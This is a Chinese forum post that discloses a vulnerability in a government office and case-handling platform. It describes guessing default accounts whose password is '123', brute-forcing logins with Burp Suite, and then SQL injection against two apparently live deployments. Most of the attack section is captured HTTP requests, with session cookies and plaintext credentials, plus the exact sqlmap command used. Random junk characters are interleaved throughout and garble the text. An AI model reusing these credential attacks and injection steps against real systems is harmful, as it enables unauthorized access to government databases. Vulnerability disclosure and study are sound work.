|
" k: `& Z' }& d/ |" i
% P) S( e& d% h$ j* H
$ j" Y9 C, s$ W, b
6 S7 ?1 K4 j5 l2 L 平台简介:
% r; E- I6 w4 ~/ }/ _5 |
4 M- C/ _& V3 U$ T. [! I9 E' C" m5 Z0 Q' f9 ]9 W: m$ E0 Q
* u4 _* K6 {1 {; J3 z$ @9 o
/ R4 ~1 ]0 Q! v/ C8 w9 H' q+ w) z
5 R( S2 ^& d& d6 z$ I* H) z) d 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
) R; z/ D4 u6 h: q# |. f
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
. `$ g& z% V, U0 k6 c2 J9 x, ?( S& p2 k同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!% q0 I4 L9 n2 K5 g
5 X# Q! o- W& _4 x; J
0 S2 s) Q0 ^* q, J( l6 `$ i
6 ~/ p) @0 B& @
- l; N2 W: k- J# Q! p
7 Y+ G% E0 h0 G' B9 [( {) y0 ] 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
; C+ [: X3 V& U1 s- P- G
7 g9 h2 G9 v+ `. k' u+ x; [4 I8 R) d8 T. L" f3 X
! @8 E! o7 [& w) S0 u: [7 K. n+ p/ L
# [5 \9 X- U3 ]8 Z& ]8 x
9 t( O( P9 w, J2 n+ O; T
http://1.1.1.1:7197/cap-aco/#(案例2-)" ?: V$ u; M; p, D) y$ W! K
, ^' Y# t* `3 L, i
1 u/ {7 E, J1 I% }& R http://www.XXOO.com (案例1-官网网站)+ o& r! V, t4 z
# o( I& K+ ], K7 Z+ T4 n! b) I# l$ }+ i# j
6 _3 v$ A# H4 j, B/ c& i
@4 D% F. J9 ~' G6 a8 N
8 \9 x3 f+ n2 n% U: _3 w 漏洞详情:
% l- y( o. Z# l4 ?- l. l
# S4 T0 a( G& o2 e3 C5 }. P, y) q; d
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试6 y9 y' b: v9 w. L, ]7 t0 i! S) @
& r/ c, L, c- Y) P5 G N( X9 ]" [1 O* ~- J" w
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:$ M, `/ j" O: u! [0 ?' K% `. ~
4 b7 O, v5 ^' X" [; }% s( R; l: g) H8 ^6 {& S; d& j- ^
/ w& U2 _! Q9 s* {
+ d* g, D) W( {8 k/ E* O1 B1 B2 a
' P5 n- { m5 h) H7 U0 { 
; _# O! L S' _& x5 m # _8 d( X2 V: w( }6 K! M
3 t+ ~% K0 l% P status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:- `4 B3 V) U& E, E5 f `
0 P3 \) G& r9 f( `
7 r0 q* `/ t, i1 U$ v8 a/ X 1、案例1-官方网站$ h. X' e( E& k5 Y
q U$ n0 i7 @# D8 t. C1 E( A9 i/ c6 ^" f- U6 @; g1 r
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
8 a5 C6 E' L6 C7 E* K. g$ W8 p
! f3 h' \6 _ J6 _, W" m7 I3 r7 @
3 w* F* o0 h2 u( u5 K( Y& P Host: www.XXOO.com
* C( F y# B) N' g, G7 ?; D* ?
$ z+ `4 {, E `9 v6 O5 S# \$ r: Z: ?, o; S0 F P
Proxy-Connection: Keep-Alive; z6 {8 n" z$ i+ Y
. V, f. A- b" h t
/ ~% ]# L: h0 I( Z6 U [% S Accept: application/json, text/javascript, */*; q=0.01
+ v, U" t6 E( E; `
2 z4 B5 P2 b7 j, I2 a2 i5 Y6 v/ |4 @1 Q* N% H6 a
Accept-Language: zh-CN o+ ]0 _9 C8 Q' R# \
: v3 |2 [3 G- W+ Y. e: H: y* x9 X
7 i7 k) p% g+ L" |8 a Content-Type: application/json& ], N2 _4 e4 z# M
& J! A0 }# f8 t7 c+ W# U
; ~3 w) ~3 T) U0 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko. I: J0 e1 t) s* W3 L* p% n% B9 k X
# B' ^% m9 k, d/ b& e; b& K% D+ ^
" H) q7 `' J y X-Requested-With: XMLHttpRequest
8 `- O+ I/ A9 x" ^1 P9 {1 [ % v+ \ [/ M3 b# ~/ C+ _
. Z) `3 v! d3 m. m; @( M- D1 r# Q Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002' b1 ^3 a: W& ~9 y6 N, m
2 @4 _; ]3 H5 G& o6 I
/ [9 Z. Q8 O0 w- Q+ ] Accept-Encoding: gzip, deflate, sdch4 |0 y8 |+ `9 B% s
3 f: R; f; u' m% B" A, X. }8 \
; t: ?9 W1 N1 q7 S6 e* L. h" O Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
) T/ P; q& w5 W 7 v( {# b3 a% i& i) R: ^
) u2 U' V1 w, j6 n, ~( B 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:. [3 w: [3 K4 {1 q. i% B- K
9 [9 ?0 M+ W5 h9 r- q; y5 E7 U. h+ n% N/ s. x
; J' @* p0 E8 i3 J) o; V
P6 B6 J: w2 P9 G# _7 a( Z. c8 l5 ^. Y+ k
- v9 e3 r- c D/ n
! `2 h8 D7 y# C9 w
- O( f, m8 q. i: U; C ; ?; r$ }; f: u& x
5 s' R* r+ l& f8 \: G/ \: @
) ]* s6 u9 p6 C; M4 H3 p& H
/ Z% S/ B- a$ p' V, o 0 I. z; e P( F) L
+ s% W0 R; K5 L8 w# S/ U
6 S: Q7 i5 e& x U3 ?% B5 k
r9 V f4 `. q! A/ H: h& C( E4 v( D
2、案例2-某天河云平台
. V1 s r* B( {* \1 G" p 4 ]/ B3 p. `* j: |5 V
1 c5 n" D7 y) i
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
+ v- s4 ~6 i! a# f- }% @/ m* C' I
# z" C# }. W/ z8 N# P
8 n5 ]9 u$ P$ Y( f2 l% a Host: 1.1.1.:7197
) G4 z' |3 z0 s3 d U3 y( R! A, r. w ( u7 Z, _: D" F! X& g- r
! E# j& I: V1 A3 Z1 |6 A% i, X5 r
Accept: application/json, text/javascript, */*; q=0.01 b% ]* P) L/ W+ x' y
! ^& {" U. i0 v, Z) p( J: G
5 s( [9 Z% y q) G' r" ? X-Requested-With: XMLHttpRequest* O+ ?: i N4 s2 Z) b; q1 n$ m
. ]1 k b, T; d, V. {& S
2 x. u+ ?. l/ o5 ? User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0/ s5 ~% |" `# T0 B' i: {
1 \% p, A, \. V) e$ e, ]& m! j
4 i( Z7 G% q9 C% o, q! g1 I Content-Type: application/json& u: r% ?9 N1 `' \$ \
y) ^4 T* v- v" m
& M% ^0 g3 C; w: U3 l' R
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=10083 L/ ~5 T T; c6 r; |, I
( q# ^5 T: ]' Y7 h6 G
9 a* E L* S* j6 C1 @6 v) b$ H Accept-Language: zh-CN,zh;q=0.8( N$ P- D% D3 U7 K. q* `9 }* {
1 T/ m- y% C( ?8 w, ^& B3 U7 t. S `7 `' `0 }
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=10 r& v$ i* [5 \+ G8 l
. n% f7 b: ~- Q- Z# k' ~) h4 O5 ^2 G* m5 U7 O
Connection: close
, @8 t) J a) t K# x' M" }4 u / E/ W) w7 Z$ ?9 G1 N
* s% h4 H# r+ l1 K9 D8 E 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
. g" v* ~- _2 i 3 @1 e2 g+ k2 z; M
- A; v4 k( ~! |" D8 N+ d 
/ n$ ^ C. o2 N: {# u
& y) c, M# e4 L9 X- G/ O$ _1 F8 B
8 e2 ?% \( H0 t M5 J
| 
发表于 2018-10-20 20:15:17
收藏
支持
反对